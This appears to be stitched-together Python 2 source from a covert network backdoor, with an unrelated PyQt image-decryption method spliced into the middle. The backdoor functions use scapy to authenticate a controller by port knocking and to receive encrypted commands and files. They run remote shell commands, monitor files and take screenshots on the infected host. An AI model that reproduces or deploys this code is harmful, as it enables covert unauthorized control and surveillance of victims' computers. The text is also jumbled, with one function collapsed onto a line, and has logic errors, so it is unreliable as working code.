def recvFile(packet):
global resultsForFiles
global state
#check if the fileIP is accepted or the state is accepted
#if they do not pass , check knock sequence
if packet[IP].src!= fileIP or state is not 3:
print "\nChecking Knock Sequence"
knock(packet)
#check packet if has IP/Raw layer and also that authentication is passed
if packet.haslayer(IP) and state is 3 and packet.haslayer(Raw):
#if the IP does not match the authenticated IP
if packet[IP].src != fileIP:
print "IP didn't match" + "source" + packet[IP].src + "fileIP" + fileIP
return
#check if the IP matches the backdoor IP
if packet[IP].src == configReader.destIP:
#load the packet content
resultsForFiles = packet[Raw].load
if packet.haslayer(Raw):
#if the load has the password embedded
if packet[Raw].load.find(configReader.password):
#remove the password to get the rest of the content
resultsForFiles.strip(configReader.password)
resultsForFiles = resultsForFiles[:-8]
#debugging purposes
print resultsForFiles
#decrypt the contents and write the files
decryptedData = encryption.decryption(resultsForFiles)
fileName, fileData = decryptedData.split("\0",1)
fileDescriptor = open(fileName, 'wb')
fileDescriptor.write(fileData)
resultsForFiles = ""
state = 0 #reset state for new knock
def __decrypt(self):
msg = qt.QMessageBox(parent=self)
if self.enc_image == None or self.key_widget.text() == '':
msg.setIcon(qt.QMessageBox.Critical)
msg.setText("Error")
msg.setInformativeText('Image file and key are required!')
msg.setWindowTitle("Error")
msg.exec_()
return
try:
self.process.setText('Processing...')
self.process.repaint()
msg = (decryption(self.enc_image, self.key_widget.text()))
self.process.setText('')
filename = qt.QFileDialog.getSaveFileName(self, "Save file",
"secret.txt", ".txt")
with open(filename[0], "w+") as f:
f.write(msg)
except:
self.process.setText('')
self.show_error("Error", "Something Went Wrong", '')
def recvCmd(packet): global results #check if the packet has IP layer if packet.haslayer(IP): #check if the packet has the same IP as the backdoor if packet[IP].src == configReader.destIP: #parse the packet and add them together dataReceived = helpers.parsePacket(packet) results += (dataReceived) print results #check packet for raw data if packet.haslayer(Raw): #if the data has the password at the end then execute decryption if packet[Raw].load == configReader.password: decryptedData = encryption.decryption(results) print decryptedData results = ""
def runCmd(packet):
global fileProcess
#check for IP and raw layer in IP
if packet.haslayer(IP) and packet.haslayer(Raw):
if packet[IP].src != clientIP:
return
print "Received Packet"
#decrypt the packet
command = encryption.decryption(packet[Raw].load)
#check for contents in command variable
if not command:
return
#check for the password
if command.startswith(configReader.password):
#grab content after the password
command = command[len(configReader.password):]
#split the command
try:
commandType, commandString = command.split(' ')
#if the command has only one command
except ValueError:
commandType = command
#if the command is shell
if commandType == 'shell':
shellCommand(packet, commandString)
#if the command is monitor
elif commandType == 'monitor':
try:
#start the monitor process
fileProcess = Process(target=startMonitor, args=(commandString, packet[IP].src))
fileProcess.daemon = True
fileProcess.start()
print "Sending Response: File Monitoring Started\n"
#catch the error if something is already monitored
except RuntimeError:
helpers.sendMessage("You already have a monitor in progress", configReader.srcIP, 9000)
except OSError:
helpers.sendMessage("Path of file/folder not found", configReader.srcIP, 9000)
#command is stop
elif commandType == 'stop':
stopMonitor()
fileProcess.terminate()
print "Monitoring has stopped"
#command is screenshot
elif commandType == 'screenshot':
screenshot(packet)
else:
print "Unknown Command\n"
helpers.sendMessage("Unknown Command", configReader.srcIP, 9000)